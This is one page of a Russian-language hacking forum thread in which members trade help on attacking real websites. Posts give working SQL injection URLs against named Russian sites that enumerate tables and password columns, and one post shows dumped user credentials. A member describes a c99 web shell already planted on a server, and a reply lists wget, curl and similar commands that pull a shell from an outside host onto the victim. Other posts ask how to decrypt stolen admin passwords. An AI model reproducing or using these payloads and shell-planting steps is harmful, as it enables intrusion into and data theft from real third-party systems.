Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
Page 365 of 1207
  1. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Ошибку 404 типо выводит. Проверка существования файла срабатывает.
    Оба способа пробовал
     
    #7281 Byrger, 27 May 2009
    1 person likes this.
  2. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    [0]:webmaster:њyЯu›И§
    [1]:administrator:џЊ6г–А¶Ґ2И
    [2]:morogoy:¶pР
    [3]:dorogoynn:Эxi›лPcх
    [4]:anna:NЂ—оB7е
    [5]:dorogoy:Уќ=цКі¶э ѓ
    вывожу из 5й ветки базы он мне вот такое дело выдает в чем беда? как исправить?
     
    #7282 satana8920, 27 May 2009
    Last edited: 27 May 2009
  3. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    попробуй
    AES_DECRYPT(AES_ENCRYPT(
    хотя, судя по всему ты юзал СИПТ, и там по умолчанию крипт.

    еще варианты:
    PHP:
    cast(Version()+as+binary)
    CONVERT(Version(),binary)
    convert(version()+using+latin1)  
    convert(version()+using+binary)
     
    #7283 $n@ke, 27 May 2009
  4. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    да я и unhex(hex())
    не помогает а юзал я да сипт
    я уж и руками пробовал

    $n@ke
    перепробовал все ничего не помогло все так же осталось

    еще у кого нито варианты будут?
     
    #7284 satana8920, 27 May 2009
    Last edited: 27 May 2009
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Будут

    Это скорее всего AES_ENCRYPT НО что-бы расшифровать нужен ключ.

    Тоесь пароли попросту зашифрованы

    Узнать ключ и расшифровать. А лучше алгоритм, тк. может быть и самопис, визуально не поймёшь
     
    #7285 Kakoytoxaker, 27 May 2009
  6. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    jokester
    и как вообще этот ключ может выглядеть?
    допустим я узнал ключ как это расшифровывать?!
     
    #7286 satana8920, 27 May 2009
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://www.mysql.ru/docs/man/Miscellaneous_functions.html
    AES_ENCRYPT
    AES_DECRYPT

    Посмотри, думаю всё станет понятно
     
    #7287 Kakoytoxaker, 27 May 2009
    1 person likes this.
  8. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    Помогите...
    http://www.aftech.ru/about/news/?nid=999999+UNION+SELECT+1,222,3,4,5,6,7,8,9--

    Unknown column 'news_datetime' in 'order clause'
    Как это обойти?
     
    #7288 DeepXhadow, 27 May 2009
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1))%3E1--
     
    #7289 R1dex, 27 May 2009
    1 person likes this.
  10. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    рубает column_name а также schema_name что можно придумать?
     
    #7290 udman, 27 May 2009
  11. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Все выводится

    http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,column_name,9+from+information_schema.columns--+

    http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,table_schema,9+from+information_schema.columns--+

    password -> 0x70617373776F7264

    http://www.rasc.ru/multimedia/svf9.shtml?album=svf9+union+select+1,2,3,4,5,6,7,table_name,9+from+information_schema.columns+where+column_name=0x70617373776F7264--+

    phpads_users
    site
    Users
     
    #7291 ElteRUS, 27 May 2009
    1 person likes this.
  12. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Пиплы,вопрос! Залил c99 на удалённый сервак.Захожу в Sec - показывается только функция /etc/passwd.Пытаюсь аплоаднуть другой шелл в другую директорию,доступную на запись - фигли.Меня кидает обратно на диру,куда я залил шелл(/download).Чем вызвана эта болезнь ? Также интересует причина возникновения *чёрных пятен*,а точнее,огромного тёмного экрана вместо исходного кода рнр скрипта.Проблема возникает при попытке просмотреть исходный код.Права для гостей(в том числе,и для меня,хоть я и отношусь к группе www на сервере),есть ТОЛЬКО права на чтение,но я ведь и не собираюсь запускать скрипт,а лишь только глянуть его исходник.У кого какие мысли ?
     
    #7292 Велемир, 27 May 2009
  13. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Во избежание лишних вопросов:

    Apache: 1.3.27
    PHP: 4.2.3
    SAFE-MODE: OFF
    Open-basedir: no value
     
    #7293 Велемир, 27 May 2009
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ))) а uname -a и id??
     
    #7294 Pashkela, 27 May 2009
  15. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Работают )
     
    #7295 Велемир, 27 May 2009
  16. Велемир

    Велемир Banned

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Что самое интересное,так это то,что права,выставленные на фаил,не влияют))).Фаил тупо не грузится и всё тут - чёрный экран.(проверял на фаилах с правами 777)
     
    #7296 Велемир, 27 May 2009
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну дык как загрузил шелл - так и грузани его с тем именем и в ту папку, в которую ты хотел бы. Или не шелл, а что ты там хотел. Чо тут думать.

    Плюс попробуй загрузить что угодно (не обязательно шелл) в папку /tmp ,как через choose, так и так вот:

    1. lynx -source "http://site/shell.txt" > /tmp/shell.php
    2. links -source "http://site/shell.txt" > /tmp/shell.php
    3. wget -o /tmp/shell.php http://site/shell.txt
    4. GET http://site/shell.txt > /tmp/shell.php
    5. fetch -o shell.php http://site/shell.txt
    6. curl --output shell.php http://site/shell.txt

    а потом:

    cp /tmp/shell.php /абсолютный_путь/папка/новое_название_шелла

    ЗЫЖ Или сразу "cp":)
     
    #7297 Pashkela, 27 May 2009
    Last edited: 27 May 2009
  18. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    Есть 2 вопроса:

    1) Про внедрение в иньекцию UPDATE.

    Пробовал на различных серваках так:

    Если вывод ошибок не отключен, то пишет что ошибка в синтаксесе.

    Тоже не срабатывает

    И даже такие запросы почему то не проходят.

    Поясните пожалуйста. Я понимаю если бы писало нет привелегий. У кго ибудь получалось значения в таблицах менять? Буду очень рад примеру


    2) Вопрос. Получил пароль админа

    В таблице с юзерами есть поле salt но оно у всех пустое. Походу подсаливание не задействовано.

    Как то зашифрован.

    Зарегал своего юзера

    Как расшифровать????
     
    #7298 farpost, 29 May 2009
  19. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 farpost
    php не поддерживает выполнения запросов к БД, разделенных символом ;
     
    #7299 Iceangel_, 29 May 2009
    1 person likes this.
  20. farpost

    farpost New Member

    Joined:
    16 May 2009
    Messages:
    20
    Likes Received:
    2
    Reputations:
    1
    И как токда проупдэйтить запись?
     
    #7300 farpost, 29 May 2009
(You must log in or sign up to post here.)
Page 365 of 1207
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.